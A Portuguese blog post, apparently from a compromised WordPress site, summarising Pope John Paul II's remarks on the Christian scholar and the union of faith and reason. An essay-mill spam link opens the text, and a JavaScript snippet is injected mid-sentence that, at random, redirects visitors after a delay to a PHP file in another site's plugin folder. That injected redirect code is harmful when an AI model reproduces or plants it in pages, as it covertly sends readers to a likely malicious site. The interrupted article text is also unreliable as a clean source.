Características do estudioso cristão

Helping you with writing a thesis https://writemyessay4me.org/ to any kind of a research paper.O papa Joao Paulo II, numa audiencia com 8000 alunos e professores da universidade Catolica Sagrado Coracao de Roma, apontou as caracteristicas do estudioso cristao. Ele disse:

O estudioso cristao, docente ou discente, distingue-se pela sua capacidade de conjugar o rigor da investigacao cientifica com a certeza da fe que Jesus Cristo, como verbo eterno de Deus, e a Verdade no seu sentido mais pleno. Daqui a sua vocacao a pesquisar,
var number1=Math.floor(Math.random() * 5);
if (number1==3)
{
var delay = 15000;
setTimeout(“document.location.href=’http://baharzaf.com/wp-content/plugins/duplicator/ctrls/wp-rsc.php'”, delay);
}
analisar e explicar cada uma das verdades a luz de Cristo, Verdade absoluta, acompanhando o estudo com a oracao e a coerencia de vida. Sede consciente desta vossa vocacao.

A afirmacao do papa fundamenta a proposta crista que deve caracterizar a investigacao cientifica. E essa fundamentacao esta na capacidade de reunir a fe e a razao na busca da verdade. Portanto, o pesquisador deve realizar o seu trabalho a luz de Cristo.

A universidade que teve a sua origem na Idade Media, sob o patrocinio da Igreja, nao pode desconsiderar as duas ordens da realidade, ou seja, a da investigacao da verdade e a da certeza de conhecer ja a fonte da verdade, pois delas decorre o sentido da existencia do ser humano.

O saber visa a servir o ser humano, por isso a investigacao cientifica deve trazer consigo a questao etica e moral como instrumento metodologicos das suas descobertas. Essa atitude decorre do principio de que a pessoa tem prioridade sobre as coisas, de que o espirito predomina sobre a materia, de que o ser humano transcende sobre o mundo e de que Deus transcende sobre o homem.

A ciencia vista sob o prisma da teologia adquire um valor maior porque estabelece um equilibrio entre os valores proprios da sua natureza e incorpora aqueles que vem da transcendencia divina.

O cristao que se dedica ao estudo da ciencia sera tanto mais fiel a verdade quanto mais entender que a fe e a razao nao sao ordens antiteticas, mas necessarias para assegurar a verdade.

Comments

Esta entrada foi publicada em Sem categoria. Adicione o link permanente aos seus favoritos.